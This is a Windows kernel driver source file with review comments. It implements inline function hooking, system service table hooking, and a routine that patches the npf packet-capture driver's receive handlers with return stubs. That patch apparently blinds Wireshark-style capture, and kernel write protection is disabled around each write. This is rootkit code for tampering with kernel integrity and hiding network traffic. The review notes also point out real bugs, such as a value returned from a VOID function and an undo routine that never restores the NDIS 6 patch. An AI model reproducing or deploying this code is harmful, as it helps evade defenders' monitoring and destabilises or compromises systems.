/*
 * Reverse the NDIS 6 handler patch applied by doPatchwsWin7: write the
 * original four prologue bytes back over the start of the
 * ReceiveNetBufferLists handler that was overwritten.
 *
 * Returns STATUS_SUCCESS on every path, including the "nothing to undo"
 * case, so callers cannot tell from the return value whether anything was
 * restored.
 *
 * NOTE(review): only g_ReceiveNetBufferListsHandler is restored here. The
 * NDIS <= 5 handlers patched in doPatchwsWin7 (g_NPFReceivePacketHandler /
 * g_NPFReceiveHandler) are not touched, so on those versions the patched
 * stub remains in place after this call.
 * NOTE(review): the restore value is a hardcoded prologue, not bytes saved
 * at patch time; it is only correct if the target function really began
 * with this exact byte sequence.
 */
NTSTATUS UndoPatchwsWin7()
{
    NTSTATUS status = STATUS_SUCCESS;
    /*
     * Original prologue; as a little-endian ULONG this is bytes 8b ff 55 8b
     * (the fifth prologue byte, 0xec, was never overwritten and is left alone):
     * aa801300 8bff   mov edi,edi
     * aa801302 55     push ebp
     * aa801303 8bec   mov ebp,esp
     */
    ULONG uRestoreCode = 0x8b55ff8b;

    if (!g_bAlreadyPatchWS) {
        kprintf("have not patched ws yet\n");
        return status;
    }

    if (g_ReceiveNetBufferListsHandler) {
        /* WPOFF()/WPON() presumably toggle kernel write protection around the
         * code write — defined elsewhere; the write must stay between them. */
        WPOFF();
        *(PULONG)g_ReceiveNetBufferListsHandler = uRestoreCode;
        WPON();
    }

    g_bAlreadyPatchWS = FALSE;
    return status;
}
/*
 * Install an inline (detour) hook described by pHookInfo.
 *
 * The first ulReplaceLen bytes of pOrigFunction are copied into a freshly
 * allocated non-paged trampoline, followed by a jump back to the remainder
 * of the original function; the start of pOrigFunction is then overwritten
 * with a jump to pHookFunction. On return pHookInfo->ulReplaceLen and
 * pHookInfo->pTramFunction describe what was replaced and where the saved
 * bytes live (UnInstallHook reads both).
 *
 * Ownership: the trampoline is allocated here with ExAllocatePool and is
 * never freed by this function (nor, from what is visible, by UnInstallHook).
 *
 * NOTE(review): `return ulTrampoline;` returns a value from a VOID function,
 * which is a constraint violation in C (the intent looks like a bare
 * `return;`).
 * NOTE(review): the ExAllocatePool result is used by RtlFillMemory without a
 * NULL check, and nothing verifies that ulReplaceLen plus the jump stub fits
 * in TrampolineLen (defined elsewhere).
 * NOTE(review): write protection is lifted (WPOFF) before the pool
 * allocation rather than only around the code writes; whether that is safe
 * depends on how WPOFF is implemented (not visible here).
 * Inline patching of kernel code of this kind is exactly what kernel code
 * integrity monitoring and hook-detection tooling look for.
 */
VOID InstallHook(PHOOK_INFO pHookInfo)
{
    ULONG_PTR ulTrampoline = 0;
    unsigned char *pTrampoline = NULL;
#ifdef _WIN64
    JMP_ABS JmpABS;      /* absolute jump stub used on x64 */
#else
    JMP_REL JmpREL;      /* rel32 jump stub used on x86 */
#endif//_WIN64
    ULONG ulReplaceLen = 0;

    if (0 == pHookInfo->pOrigFunction || 0 == pHookInfo->pHookFunction) {
        return ulTrampoline;
    }

    //
    // Use the disassembly engine to compute how many whole instructions
    // (in bytes) must be relocated to make room for the jump stub.
    //
    ulReplaceLen = CalcReplaceSize(pHookInfo->pOrigFunction);

    WPOFF();

    //
    // Build the trampoline: the original function's replaced bytes,
    // followed by a jump to the first instruction after them.
    //
    pTrampoline = (unsigned char *)ExAllocatePool(NonPagedPool, TrampolineLen);
    RtlFillMemory(pTrampoline, TrampolineLen, 0x90);   /* 0x90 = NOP filler */
    ulTrampoline = (ULONG_PTR)pTrampoline;
    memcpy((PCHAR)(ulTrampoline), (PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen);

#ifdef _WIN64
    JmpABS = MakeAbstractJump(pHookInfo->pOrigFunction + ulReplaceLen);
    memcpy(((PCHAR)ulTrampoline + ulReplaceLen), (PVOID)(&JmpABS), sizeof(JMP_ABS));
#else
    /* Relative jump is computed from the trampoline address to pOrigFunction;
     * the offset past ulReplaceLen is handled inside MakeRelativeJump or not
     * at all — not visible here, confirm against its definition. */
    JmpREL = MakeRelativeJump(ulTrampoline, pHookInfo->pOrigFunction);
    memcpy((PCHAR)(ulTrampoline + ulReplaceLen), (PCHAR)(&JmpREL), sizeof(JMP_REL));
#endif//_WIN64

    //
    // Overwrite the start of the original function with a JMP to the hook.
    //
    RtlFillMemory((PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen, 0x90);

#ifdef _WIN64
    JmpABS = MakeAbstractJump(pHookInfo->pHookFunction);
    memcpy((PCHAR)(pHookInfo->pOrigFunction), (PVOID)(&JmpABS), sizeof(JMP_ABS));
#else
    JmpREL = MakeRelativeJump(pHookInfo->pOrigFunction, pHookInfo->pHookFunction);
    memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(&JmpREL), sizeof(JMP_REL));
#endif//_WIN64

    WPON();

    /* Record what was replaced so UnInstallHook can put it back. */
    pHookInfo->ulReplaceLen = ulReplaceLen;
    pHookInfo->pTramFunction = (ULONG_PTR)pTrampoline;
}
/*
 * Remove an inline hook installed by InstallHook: copy the saved original
 * bytes (the head of the trampoline) back over the start of pOrigFunction.
 *
 * Relies on pHookInfo->pTramFunction and pHookInfo->ulReplaceLen having been
 * filled in by InstallHook; neither is validated here.
 *
 * NOTE(review): the trampoline pool allocation made in InstallHook is not
 * freed here, so each install/uninstall cycle leaks it.
 * NOTE(review): nothing here synchronises with threads that may currently be
 * executing inside the trampoline or the hook — whether that matters depends
 * on the callers, which are not visible.
 */
VOID UnInstallHook(PHOOK_INFO pHookInfo)
{
    //
    // Restore the replaced bytes of the original function.
    //
    WPOFF();
    memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(pHookInfo->pTramFunction), pHookInfo->ulReplaceLen);
    WPON();
}
// Restore a hooked system service table entry.
/*
 * Write the saved original handler for service OldService back into the
 * service table slot, undoing Hook().
 *
 * Returns STATUS_UNSUCCESSFUL if the table bookkeeping (g_Init) has not been
 * set up, otherwise STATUS_SUCCESS.
 *
 * SERVICE_FUNCTION / SERVICE_ID and OldServiceAddressTable are defined
 * elsewhere; presumably the table holds the addresses captured at init time —
 * confirm against the init routine.
 */
NTSTATUS UnHook(ULONG OldService)
{
    if (!g_Init) {
        return STATUS_UNSUCCESSFUL;
    }

    WPOFF();
    // Put the original service address back.
    *(PULONG)SERVICE_FUNCTION(OldService) = OldServiceAddressTable[SERVICE_ID(OldService)];
    WPON();

    return STATUS_SUCCESS;
}
/*
 * Redirect system service OldService to NewService by overwriting its
 * service table slot.
 *
 * Returns STATUS_UNSUCCESSFUL if the table bookkeeping (g_Init) has not been
 * set up, otherwise STATUS_SUCCESS.
 *
 * NOTE(review): the previous slot value is not saved here; UnHook relies on
 * OldServiceAddressTable, which must have been populated elsewhere
 * (presumably at init) for the restore to be correct.
 * Service-table modification is a classic integrity-monitor / anti-rootkit
 * detection target.
 */
NTSTATUS Hook(ULONG OldService, ULONG NewService)
{
    if (!g_Init) {
        /* Runtime string kept as-is (including the "Talbe" typo). */
        DbgPrint(("ServiceTalbe Not Init.\n"));
        return STATUS_UNSUCCESSFUL;
    }

    WPOFF();
    DbgPrint("NewService");
    //TRACE("New Service\n");
    *(PULONG)SERVICE_FUNCTION(OldService) = NewService;
    WPON();

    return STATUS_SUCCESS;
}
/*
 * Locate the npf protocol block named by ProName/dwLen and overwrite the
 * entry of its receive handler with a 4-byte immediate-return stub, so the
 * capture driver's receive callback returns without processing. Which
 * handler is patched depends on the protocol block's MajorNdisVersion.
 *
 * Parameters:
 *   ProName, dwLen — protocol name (and its length) passed through to
 *                    GetTargetProtocolBlockWin7 (defined elsewhere).
 * Returns STATUS_SUCCESS, or STATUS_UNSUCCESSFUL if the protocol block or a
 * usable handler could not be found.
 *
 * Side effects: sets g_pNpfProtocolBlockWin7, g_PatchwsVersion and one or
 * more of g_NPFReceiveHandler / g_NPFReceivePacketHandler /
 * g_ReceiveNetBufferListsHandler.
 *
 * NOTE(review): g_bAlreadyPatchWS is set to TRUE only in the NDIS <= 5
 * branch. The NDIS 6 branch patches g_ReceiveNetBufferListsHandler but never
 * sets the flag, so UndoPatchwsWin7 (which checks the flag first) will
 * report "have not patched ws yet" and leave the NDIS 6 stub in place.
 * Conversely, UndoPatchwsWin7 only restores the NDIS 6 handler, so the
 * NDIS <= 5 patches made here are never restored.
 * NOTE(review): pointers are round-tripped through DWORD, so this code is
 * 32-bit only.
 * NOTE(review): the g_*Offset values are assumed already valid for this OS
 * build; a wrong offset dereferences and patches arbitrary kernel memory.
 * Overwriting another driver's callback entry is a kernel code-integrity
 * violation that integrity monitoring is designed to detect.
 */
NTSTATUS doPatchwsWin7(char *ProName, DWORD dwLen)
{
    NTSTATUS status = STATUS_SUCCESS;
    /* 4-byte stubs written over the handler entry: `ret imm16` followed by
     * one filler byte (0xcc / 0x90). The imm16 differs per calling
     * convention: 0x1c for the NDIS <= 5 handlers, 0x14 for NDIS 6. */
    ULONG uPatchRet3 = 0xcc001cc2;
    ULONG uPatchRet5 = 0x900014c2;
    PDWORD pdwTmp = NULL;
    DWORD dwTmp = 0;

    if (g_bAlreadyPatchWS) {
        return status;
    }

    do {
        g_pNpfProtocolBlockWin7 = (PNDIS_PROTOCOL_BLOCKWin7)GetTargetProtocolBlockWin7(ProName, dwLen);
        if (g_pNpfProtocolBlockWin7 == NULL) {
            status = STATUS_UNSUCCESSFUL;
            break;
        }

        // Only handle NDIS major version 5 (and below) in this branch.
        g_PatchwsVersion = g_pNpfProtocolBlockWin7->MajorNdisVersion;
        if (g_PatchwsVersion <= 5) {
            dwTmp = (DWORD)g_pNpfProtocolBlockWin7;
            pdwTmp = (PDWORD)(dwTmp + g_ReceiveHandlerOffset);
            //Get the old recv
            g_NPFReceiveHandler = (ULONG)*pdwTmp;

            dwTmp = (DWORD)g_pNpfProtocolBlockWin7;
            pdwTmp = (PDWORD)(dwTmp + g_ReceivePacketHandlerOffset);
            //Get the old recvpacket
            g_NPFReceivePacketHandler = (ULONG)*pdwTmp;

            /* Prefer the ReceivePacket handler; fall back to Receive. */
            if (g_NPFReceivePacketHandler) {
                WPOFF();
                *(PULONG)g_NPFReceivePacketHandler = uPatchRet3;
                WPON();
            } else {
                if (g_NPFReceiveHandler == 0) {
                    kprintf("what??? there is no receive handler for npf??\n");
                    status = STATUS_UNSUCCESSFUL;
                    break;
                }
                WPOFF();
                *(PULONG)g_NPFReceiveHandler = uPatchRet3;
                WPON();
            }
            g_bAlreadyPatchWS = TRUE;
            break;
        }////end: version <= 5 branch

        //ndis 6
        if (g_PatchwsVersion == 6) {
            dwTmp = (DWORD)g_pNpfProtocolBlockWin7;
            pdwTmp = (PDWORD)(dwTmp + g_ReceiveNetBufferListsHandlerOffset);
            //Get the old recvlist
            g_ReceiveNetBufferListsHandler = *pdwTmp;
            if (g_ReceiveNetBufferListsHandler) {
                WPOFF();
                *(PULONG)g_ReceiveNetBufferListsHandler = uPatchRet5;
                WPON();
            } else {
                status = STATUS_UNSUCCESSFUL;
            }
            /* g_bAlreadyPatchWS is not set on this path (see header note). */
            break;
        }
    } while (0);

    return status;
}